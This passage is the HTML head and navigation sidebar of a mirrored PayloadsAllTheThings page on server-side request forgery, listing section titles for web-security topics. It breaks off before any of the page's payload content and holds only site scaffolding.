ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-19 19:06:12 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
8130dc7c4b
PayloadsAllTheThings/Server Side Request Forgery/index.html

6719 lines
168 KiB
HTML
Raw Blame History

<!doctype html>
<html lang="en" class="no-js">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1">
<meta name="description" content="Payloads All The Things, a list of useful payloads and bypasses for Web Application Security">
<link rel="canonical" href="https://swisskyrepo.github.io/PayloadsAllTheThings/Server%20Side%20Request%20Forgery/">
<link rel="prev" href="../Server%20Side%20Include%20Injection/">
<link rel="next" href="SSRF-Advanced-Exploitation/">
<link rel="icon" href="../assets/images/favicon.png">
<meta name="generator" content="mkdocs-1.6.1, mkdocs-material-9.5.47">
<title>Server-Side Request Forgery - Payloads All The Things</title>
<link rel="stylesheet" href="../assets/stylesheets/main.6f8fc17f.min.css">
<link rel="stylesheet" href="../assets/stylesheets/palette.06af60db.min.css">
<style>
.social-container {
float: right;
}
</style>
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300i,400,400i,700,700i%7CRoboto+Mono:400,400i,700,700i&display=fallback">
<style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
<link rel="stylesheet" href="../custom.css">
<script>__md_scope=new URL("..",location),__md_hash=e=>[...e].reduce(((e,_)=>(e<<5)-e+_.charCodeAt(0)),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
<meta property="og:type" content="website" >
<meta property="og:title" content="Server-Side Request Forgery - Payloads All The Things" >
<meta property="og:description" content="Payloads All The Things, a list of useful payloads and bypasses for Web Application Security" >
<meta property="og:image" content="https://swisskyrepo.github.io/PayloadsAllTheThings/assets/images/social/Server Side Request Forgery/README.png" >
<meta property="og:image:type" content="image/png" >
<meta property="og:image:width" content="1200" >
<meta property="og:image:height" content="630" >
<meta property="og:url" content="https://swisskyrepo.github.io/PayloadsAllTheThings/Server%20Side%20Request%20Forgery/" >
<meta name="twitter:card" content="summary_large_image" >
<meta name="twitter:title" content="Server-Side Request Forgery - Payloads All The Things" >
<meta name="twitter:description" content="Payloads All The Things, a list of useful payloads and bypasses for Web Application Security" >
<meta name="twitter:image" content="https://swisskyrepo.github.io/PayloadsAllTheThings/assets/images/social/Server Side Request Forgery/README.png" >
</head>
<body dir="ltr" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="indigo">
<input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
<input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
<label class="md-overlay" for="__drawer"></label>
<div data-md-component="skip">
<a href="#server-side-request-forgery" class="md-skip">
Skip to content
</a>
</div>
<div data-md-component="announce">
</div>
<header class="md-header md-header--shadow" data-md-component="header">
<nav class="md-header__inner md-grid" aria-label="Header">
<a href=".." title="Payloads All The Things" class="md-header__button md-logo" aria-label="Payloads All The Things" data-md-component="logo">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>
</a>
<label class="md-header__button md-icon" for="__drawer">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3zm0 5h18v2H3zm0 5h18v2H3z"/></svg>
</label>
<div class="md-header__title" data-md-component="header-title">
<div class="md-header__ellipsis">
<div class="md-header__topic">
<span class="md-ellipsis">
Payloads All The Things
</span>
</div>
<div class="md-header__topic" data-md-component="header-topic">
<span class="md-ellipsis">
Server-Side Request Forgery
</span>
</div>
</div>
</div>
<form class="md-header__option" data-md-component="palette">
<input class="md-option" data-md-color-media="(prefers-color-scheme: light)" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="indigo" aria-label="Switch to dark mode" type="radio" name="__palette" id="__palette_0">
<label class="md-header__button md-icon" title="Switch to dark mode" for="__palette_1" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a4 4 0 0 0-4 4 4 4 0 0 0 4 4 4 4 0 0 0 4-4 4 4 0 0 0-4-4m0 10a6 6 0 0 1-6-6 6 6 0 0 1 6-6 6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12z"/></svg>
</label>
<input class="md-option" data-md-color-media="(prefers-color-scheme: dark)" data-md-color-scheme="slate" data-md-color-primary="indigo" data-md-color-accent="indigo" aria-label="Switch to light mode" type="radio" name="__palette" id="__palette_1">
<label class="md-header__button md-icon" title="Switch to light mode" for="__palette_0" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 18c-.89 0-1.74-.2-2.5-.55C11.56 16.5 13 14.42 13 12s-1.44-4.5-3.5-5.45C10.26 6.2 11.11 6 12 6a6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12z"/></svg>
</label>
</form>
<script>var palette=__md_get("__palette");if(palette&&palette.color){if("(prefers-color-scheme)"===palette.color.media){var media=matchMedia("(prefers-color-scheme: light)"),input=document.querySelector(media.matches?"[data-md-color-media='(prefers-color-scheme: light)']":"[data-md-color-media='(prefers-color-scheme: dark)']");palette.color.media=input.getAttribute("data-md-color-media"),palette.color.scheme=input.getAttribute("data-md-color-scheme"),palette.color.primary=input.getAttribute("data-md-color-primary"),palette.color.accent=input.getAttribute("data-md-color-accent")}for(var[key,value]of Object.entries(palette.color))document.body.setAttribute("data-md-color-"+key,value)}</script>
<label class="md-header__button md-icon" for="__search">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
</label>
<div class="md-search" data-md-component="search" role="dialog">
<label class="md-search__overlay" for="__search"></label>
<div class="md-search__inner" role="search">
<form class="md-search__form" name="search">
<input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
<label class="md-search__icon md-icon" for="__search">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11z"/></svg>
</label>
<nav class="md-search__options" aria-label="Search">
<a href="javascript:void(0)" class="md-search__icon md-icon" title="Share" aria-label="Share" data-clipboard data-clipboard-text="" data-md-component="search-share" tabindex="-1">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M18 16.08c-.76 0-1.44.3-1.96.77L8.91 12.7c.05-.23.09-.46.09-.7s-.04-.47-.09-.7l7.05-4.11c.54.5 1.25.81 2.04.81a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3c0 .24.04.47.09.7L8.04 9.81C7.5 9.31 6.79 9 6 9a3 3 0 0 0-3 3 3 3 0 0 0 3 3c.79 0 1.5-.31 2.04-.81l7.12 4.15c-.05.21-.08.43-.08.66 0 1.61 1.31 2.91 2.92 2.91s2.92-1.3 2.92-2.91A2.92 2.92 0 0 0 18 16.08"/></svg>
</a>
<button type="reset" class="md-search__icon md-icon" title="Clear" aria-label="Clear" tabindex="-1">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"/></svg>
</button>
</nav>
<div class="md-search__suggest" data-md-component="search-suggest"></div>
</form>
<div class="md-search__output">
<div class="md-search__scrollwrap" tabindex="0" data-md-scrollfix>
<div class="md-search-result" data-md-component="search-result">
<div class="md-search-result__meta">
Initializing search
</div>
<ol class="md-search-result__list" role="presentation"></ol>
</div>
</div>
</div>
</div>
</div>
<div class="md-header__source">
<a href="https://github.com/swisskyrepo/PayloadsAllTheThings/" title="Go to repository" class="md-source" data-md-component="source">
<div class="md-source__icon md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><!--! Font Awesome Free 6.7.1 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2024 Fonticons, Inc.--><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6m-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3m44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9M244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8M97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1m-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7m32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1m-11.4-14.7c-1.6 1-1.6 3.6 0 5.9s4.3 3.3 5.6 2.3c1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2"/></svg>
</div>
<div class="md-source__repository">
GitHub
</div>
</a>
</div>
</nav>
</header>
<div class="md-container" data-md-component="container">
<main class="md-main" data-md-component="main">
<div class="md-main__inner md-grid">
<div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
<div class="md-sidebar__scrollwrap">
<div class="md-sidebar__inner">
<nav class="md-nav md-nav--primary" aria-label="Navigation" data-md-level="0">
<label class="md-nav__title" for="__drawer">
<a href=".." title="Payloads All The Things" class="md-nav__button md-logo" aria-label="Payloads All The Things" data-md-component="logo">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>
</a>
Payloads All The Things
</label>
<div class="md-nav__source">
<a href="https://github.com/swisskyrepo/PayloadsAllTheThings/" title="Go to repository" class="md-source" data-md-component="source">
<div class="md-source__icon md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><!--! Font Awesome Free 6.7.1 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2024 Fonticons, Inc.--><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6m-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3m44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9M244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8M97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1m-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7m32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1m-11.4-14.7c-1.6 1-1.6 3.6 0 5.9s4.3 3.3 5.6 2.3c1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2"/></svg>
</div>
<div class="md-source__repository">
GitHub
</div>
</a>
</div>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href=".." class="md-nav__link">
<span class="md-ellipsis">
Payloads All The Things
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../CONTRIBUTING/" class="md-nav__link">
<span class="md-ellipsis">
CONTRIBUTING
</span>
</a>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_3" >
<label class="md-nav__link" for="__nav_3" id="__nav_3_label" tabindex="0">
<span class="md-ellipsis">
API Key Leaks
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_3_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_3">
<span class="md-nav__icon md-icon"></span>
API Key Leaks
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../API%20Key%20Leaks/" class="md-nav__link">
<span class="md-ellipsis">
API Key and Token Leaks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../API%20Key%20Leaks/IIS-Machine-Keys/" class="md-nav__link">
<span class="md-ellipsis">
IIS Machine Keys
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4" >
<label class="md-nav__link" for="__nav_4" id="__nav_4_label" tabindex="0">
<span class="md-ellipsis">
Account Takeover
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_4_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_4">
<span class="md-nav__icon md-icon"></span>
Account Takeover
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Account%20Takeover/" class="md-nav__link">
<span class="md-ellipsis">
Account Takeover
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Account%20Takeover/mfa-bypass/" class="md-nav__link">
<span class="md-ellipsis">
MFA Bypasses
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_5" >
<label class="md-nav__link" for="__nav_5" id="__nav_5_label" tabindex="0">
<span class="md-ellipsis">
Business Logic Errors
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_5_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_5">
<span class="md-nav__icon md-icon"></span>
Business Logic Errors
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Business%20Logic%20Errors/" class="md-nav__link">
<span class="md-ellipsis">
Business Logic Errors
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_6" >
<label class="md-nav__link" for="__nav_6" id="__nav_6_label" tabindex="0">
<span class="md-ellipsis">
CORS Misconfiguration
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_6_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_6">
<span class="md-nav__icon md-icon"></span>
CORS Misconfiguration
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CORS%20Misconfiguration/" class="md-nav__link">
<span class="md-ellipsis">
CORS Misconfiguration
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_7" >
<label class="md-nav__link" for="__nav_7" id="__nav_7_label" tabindex="0">
<span class="md-ellipsis">
CRLF Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_7_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_7">
<span class="md-nav__icon md-icon"></span>
CRLF Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CRLF%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Carriage Return Line Feed
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_8" >
<label class="md-nav__link" for="__nav_8" id="__nav_8_label" tabindex="0">
<span class="md-ellipsis">
CSV Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_8_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_8">
<span class="md-nav__icon md-icon"></span>
CSV Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CSV%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
CSV Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_9" >
<label class="md-nav__link" for="__nav_9" id="__nav_9_label" tabindex="0">
<span class="md-ellipsis">
CVE Exploits
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_9_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_9">
<span class="md-nav__icon md-icon"></span>
CVE Exploits
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CVE%20Exploits/" class="md-nav__link">
<span class="md-ellipsis">
Common Vulnerabilities and Exposures
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../CVE%20Exploits/Log4Shell/" class="md-nav__link">
<span class="md-ellipsis">
CVE-2021-44228 Log4Shell
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10" >
<label class="md-nav__link" for="__nav_10" id="__nav_10_label" tabindex="0">
<span class="md-ellipsis">
Clickjacking
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_10_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_10">
<span class="md-nav__icon md-icon"></span>
Clickjacking
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Clickjacking/" class="md-nav__link">
<span class="md-ellipsis">
Clickjacking
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_11" >
<label class="md-nav__link" for="__nav_11" id="__nav_11_label" tabindex="0">
<span class="md-ellipsis">
Client Side Path Traversal
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_11_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_11">
<span class="md-nav__icon md-icon"></span>
Client Side Path Traversal
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Client%20Side%20Path%20Traversal/" class="md-nav__link">
<span class="md-ellipsis">
Client Side Path Traversal
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_12" >
<label class="md-nav__link" for="__nav_12" id="__nav_12_label" tabindex="0">
<span class="md-ellipsis">
Command Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_12_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_12">
<span class="md-nav__icon md-icon"></span>
Command Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Command%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Command Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_13" >
<label class="md-nav__link" for="__nav_13" id="__nav_13_label" tabindex="0">
<span class="md-ellipsis">
Cross Site Request Forgery
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_13_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_13">
<span class="md-nav__icon md-icon"></span>
Cross Site Request Forgery
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Cross-Site%20Request%20Forgery/" class="md-nav__link">
<span class="md-ellipsis">
Cross-Site Request Forgery
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_14" >
<label class="md-nav__link" for="__nav_14" id="__nav_14_label" tabindex="0">
<span class="md-ellipsis">
DNS Rebinding
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_14_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_14">
<span class="md-nav__icon md-icon"></span>
DNS Rebinding
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../DNS%20Rebinding/" class="md-nav__link">
<span class="md-ellipsis">
DNS Rebinding
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_15" >
<label class="md-nav__link" for="__nav_15" id="__nav_15_label" tabindex="0">
<span class="md-ellipsis">
DOM Clobbering
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_15_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_15">
<span class="md-nav__icon md-icon"></span>
DOM Clobbering
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../DOM%20Clobbering/" class="md-nav__link">
<span class="md-ellipsis">
DOM Clobbering
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_16" >
<label class="md-nav__link" for="__nav_16" id="__nav_16_label" tabindex="0">
<span class="md-ellipsis">
Denial of Service
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_16_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_16">
<span class="md-nav__icon md-icon"></span>
Denial of Service
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Denial%20of%20Service/" class="md-nav__link">
<span class="md-ellipsis">
Denial of Service
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_17" >
<label class="md-nav__link" for="__nav_17" id="__nav_17_label" tabindex="0">
<span class="md-ellipsis">
Dependency Confusion
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_17_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_17">
<span class="md-nav__icon md-icon"></span>
Dependency Confusion
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Dependency%20Confusion/" class="md-nav__link">
<span class="md-ellipsis">
Dependency Confusion
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_18" >
<label class="md-nav__link" for="__nav_18" id="__nav_18_label" tabindex="0">
<span class="md-ellipsis">
Directory Traversal
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_18_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_18">
<span class="md-nav__icon md-icon"></span>
Directory Traversal
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Directory%20Traversal/" class="md-nav__link">
<span class="md-ellipsis">
Directory Traversal
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_19" >
<label class="md-nav__link" for="__nav_19" id="__nav_19_label" tabindex="0">
<span class="md-ellipsis">
File Inclusion
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_19_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_19">
<span class="md-nav__icon md-icon"></span>
File Inclusion
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../File%20Inclusion/" class="md-nav__link">
<span class="md-ellipsis">
File Inclusion
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../File%20Inclusion/LFI-to-RCE/" class="md-nav__link">
<span class="md-ellipsis">
LFI to RCE
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../File%20Inclusion/Wrappers/" class="md-nav__link">
<span class="md-ellipsis">
Inclusion Using Wrappers
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_20" >
<label class="md-nav__link" for="__nav_20" id="__nav_20_label" tabindex="0">
<span class="md-ellipsis">
Google Web Toolkit
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_20_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_20">
<span class="md-nav__icon md-icon"></span>
Google Web Toolkit
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Google%20Web%20Toolkit/" class="md-nav__link">
<span class="md-ellipsis">
Google Web Toolkit
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_21" >
